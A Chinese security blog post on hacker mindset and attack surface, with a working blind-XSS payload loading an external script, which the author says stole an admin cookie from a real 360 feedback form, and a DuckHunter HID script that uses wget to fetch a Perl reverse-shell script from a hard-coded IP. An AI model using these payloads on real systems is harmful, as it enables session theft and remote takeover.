【黑客浅析】像黑客一样思考

网络安全里经常说的一句话是未知攻焉知防,基本所有的安全人员也是一名黑客,在黑客攻击愈发普遍的今天,如何更好的防御黑客攻击?用句带有点哲学的话,成为黑客,只有成为黑客,像黑客一样思考,你才能知道从哪去防御黑客;很俗的一句话,但很实在!

看到了什么?

看到上图的第一直觉,你可以自己想下答案,问问自己看到了什么?

正常的思维,第一直观感受是中间那个很明显,很大的黑点,因为这个黑点最吸引大家的注意力,稍微看过一些哲学故事的同学可能会想到黑点周围白色的区域,是的,黑点只是其中一个小点,而黑点周围白色的部分则足够大;但是,我不知道有没有人的答案是白色再外面?文章区域再外面?或者整个浏览器?整个电脑屏幕?电脑外呢?其实想表达的也正是黑客的思维里,永远不是局限于可以看到的部分,而在于能够想到或者没想到的所有面。

其实这类同于攻击面!安全是木桶短板原理,木桶能装多少水不在于最长的那块板,而是最短的那块;而一个系统的安全程度不取决于安全做的多全,做的多高大上,而在于是否把那些最简单的问题处理掉?数据告诉我们,服务器入侵,除了漏洞之外最大途径是弱口令,而这就是一个根本没多少技术含量的方式,属于安全基线问题,就是同样的道理。对于黑客而言,攻击面不会局限于能够看到的点,而在于所有可能关联或者没关联的面,就比如渗透测试或者说APT,很多时候结合社工这个点能够取得很好的效果,成为一个绝佳的入侵渠道。所以,第一点,学会放开自己的思维与想象,发现和关注平时所容易忽略和没有看到的地方。

什么是黑客?

什么是黑客?我用八个字总结,突破创造,守正出奇。在我看来,黑客永远不是一个贬义词,黑客本身就是极客,对于黑客来说,这个世界充满好奇,这个世界有太多的东西可以探索,特别是网络的世界。

黑客是一个追求自由的群体,不喜欢受到条条框框的约束,总是喜欢突破这一切,突破同时也可能是一种创造,创造新的方法,新的方式,新的工具,新的东西,就比如上图,小学课本里的乌鸦喝水,在我们看来是一种很傻的行为,但未尝不是一种稳定传统的方式?在生活中很多的事不也正如此?或者说就网络上很多安全的措施有时候也是稳定起见,因为新的东西除了先进,有时候也会带来风险。而对于黑客来说,可能考虑的更不是这些,而是尝试,好奇一切。

对于黑客而言,也有自己的黑客精神,有自己要坚持和秉承的东西(地下黑客的原则可能不同于正常黑客),这就是守正,自由、共享、平等、互助;在Web安全的世界里,我们经常会提到一个词"猥琐",或者说不仅限于Web安全,因为很多时候攻击的产生不是利用一个多厉害的漏洞,而在于猥琐的思路,几个定义为低危的小漏洞的组合也许威力比一个高危漏洞还大,这就取决于漏洞的组合使用,利用思路;这些"猥琐行为"就是一种出奇的表现。

了解黑客,成为黑客,才能更好的学会黑客的思考。

看到框就想X

这是一个意见反馈的界面,看到这样一个界面,大家会怎么做?对于普通人来说,这就是一个正常的意见提交框,用处就是提交反馈内容;大家想想黑客会怎么做?提交攻击代码,比如下面的代码:

</textarea>'"><script src=http://t.cn/R63bUP9></script>

实际上,当时看到这样一个功能,我就这样做了。这是360手游客服中心手机版的一个页面,可以提交反馈意见,我当时就直接提交了上面的攻击代码,然后就攻击成功了(这其实是一次XSS盲打,什么是XSS盲打大家可以自行搜索或者看我之前发的文章)。由于这样的功能往往看反馈内容的都是系统的相关管理员,于是被攻击成功的也是管理员,通过XSS盲打可以直接拿到管理员登录的账号的Cookie等信息(下图就是盲打平台中收到的攻击成功返回的后台地址和管理员Cookie)。

当然,不仅限于这个页面,还有其他的:

这种行为总结而言,就是"看到框就想X",这里的X也就是XSS的意思;其实这更多的是一种习惯和意识,在黑客的想法里,看到功能首先想到的不是使用,而是能不能利用,然后由于攻击做的多了,看到不同的功能和应用页面,自然就能意识到可能存在的问题,自然而然的就会去测试;经常会有很多人问,那些人在各种SRC提交的漏洞都是怎么挖的,是不是有神器?但是也不是每个人的安全测试工具都是神器啊!其实很多时候是在使用中发现漏洞!

不同的潜意识行为和想法,取决于不同的知识面和经验,也取决于不同的目的。

功能也是攻击方式

如果手机没电了,那么旁边如果其他人正好有电脑,借用其他人电脑的USB口给手机充电是一件很常见的事,但其实,只是插个数据线,也可以导致电脑被攻击,下面视频演示的是一部手机通过USB连接MAC电脑执行指定的命令(视频里是ifconfig)。

视频内容

视频里的手机是一个很普通的手机,安装了一个叫做"Nethunter"的黑客操作系统,也就成为"黑客手机",里面集成了一些黑客攻击工具,比如视频里演示的工具叫做DuckHunter HID。看到这个视频,大家是否会觉得这个攻击挺高端的,物理黑客攻击,但当我告诉大家原理之后,大家可能想到的就是"原来如此,这么简单"。

手机上显示的代码是:

CONTROL SPACE
STRING iterm
ENTERENTER
STRING
ifconfig
ENTER

看完这个代码不知道大家是否已经明白了攻击原理,熟悉MAC操作的同学可能知道CONTROL+SPACE其实是调起Spotlight,一个类似快捷启动的工具,然后输入iterm,就是查找iTerm,然后回车,打开iTerm后,再输入ifconfig,再回车,就完成了整个命令输入执行的过程;大家可以发现,这其实就是一个模拟键盘操作的过程,没错,上面视频演示的攻击原理就是模拟键盘操作,其实这时候的手机用USB接入电脑相其实就是把自己设置为键盘接入电脑,然后再直接模拟键盘操作进行攻击。

那么是否可以进行危害更大的攻击?比如反弹Shell?当然可以,改下代码即可:

CONTROL SPACE
STRING iterm 
ENTERENTER
STRING wget http://45.32.8.108/b.pl.txt -O /tmp/b.plSTRING perl /tmp/b.pl 
反弹监听IP 监听端口
ENTER

采用下载一个Perl脚本来实现反弹Shell,如下面视频:

视频内容

讲这个例子的目的其实就是这部分的标题,功能也是攻击方式。在黑客的眼里,不是一定得使用漏洞,使用多高端的技巧,能达到攻击目的和效果的方式都是好的攻击方式,这些方式不局限于大家所了解的只是漏洞或者暴力破解等,而经常做的就是利用正常的功能来实现攻击,这种攻击因为使用的是正常的功能,有时候反而更隐蔽;而类似的攻击方式,不在少数。

结语

其实,近几年来,大家对黑客的了解已经越来越多,黑客也越来越失去神秘,然后大家就会发现,他们其实也是生活中的普通人;而在黑夜中工作,有时更多的是因为那时候安静,做事效率高,或者是管理员不在线好做一些秘密的攻击和测试等,而不是所谓各种描述里的戴着衣帽,把自己包裹在黑暗中,不露出自己的真面目等。

其实黑客所不同于普通人的点,除了掌握的知识外,就是做事和思考的方式,仅此而已!

原创声明,本文系作者授权云+社区-专栏发表,未经许可,不得转载。

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏逸鹏说道

携程:关于反爬虫,看这一篇就够了

编者:本文来自携程酒店研发部研发经理崔广宇在第三期【携程技术微分享】上的分享,以下为整理的内容概要。墙裂建议点击视频回放(http://v.qq.com/pag...

657100
来自专栏非著名程序员

微软收购 GitHub ,GitLab 或成最大赢家?

15730
来自专栏FreeBuf

测试全球最安全的手机Blackphone

当智能手机发展愈发成熟的时候,会涌现出一些有意思的分支,比如有人觉得隐私是一件很严肃的事情,必须认真对待,于是催生了 Blackphone:一款为隐私而生的手机...

38490
来自专栏FreeBuf

对话近期多个DoD漏洞发现者Alyssa Herrera

大家好,我是Alyssa Herrera,现在是一名全职的漏洞挖掘者,我住在美国加利福尼亚。业余时间喜欢玩游戏,和朋友聊天。

11440

5种方法来保护你自己免受密码安全的攻击

这可能发生在我们任何人身上,并且按照这个速度,各种网络服务器的大量密码字典以惊人的速度将被在线发布(主要是暗网)。可能由于相关的一系列大规模黑客攻击,超过6.4...

17130
来自专栏非著名程序员

这是一个众人裸奔的时代,你害怕吗!!!

18730
来自专栏安全领域

能够保护公司免受黑客攻击的最佳实践经验

原文地址:https://www.entrepreneur.com/article/237174

11620
来自专栏玉树芝兰

为什么你不该用免费公共WiFi?

商业区的饭馆或咖啡厅,一般都会在门口显著的位置贴几个科技感十足的标志。除了“大众点评合作商家”、“支持支付宝/微信支付”,最能吸引眼球的就是“本店提供免费WiF...

12420
来自专栏黑白安全

社会工程学

社交工程是用于通过人类交互完成的广泛恶意活动的术语。它使用心理操纵来诱骗用户犯下安全错误或泄露敏感信息。

77920
来自专栏FreeBuf

记一次网络诈骗追踪过程

本文素材均来源于真实事件,有关细节因隐私问题暂时隐去。事件是近日的某天,一位朋友通过微信联系到我,当时我正沉浸在LOL被坑的苦恼中…… ? 一开始我以为是咸鱼...

303100

扫码关注云+社区

领取腾讯云代金券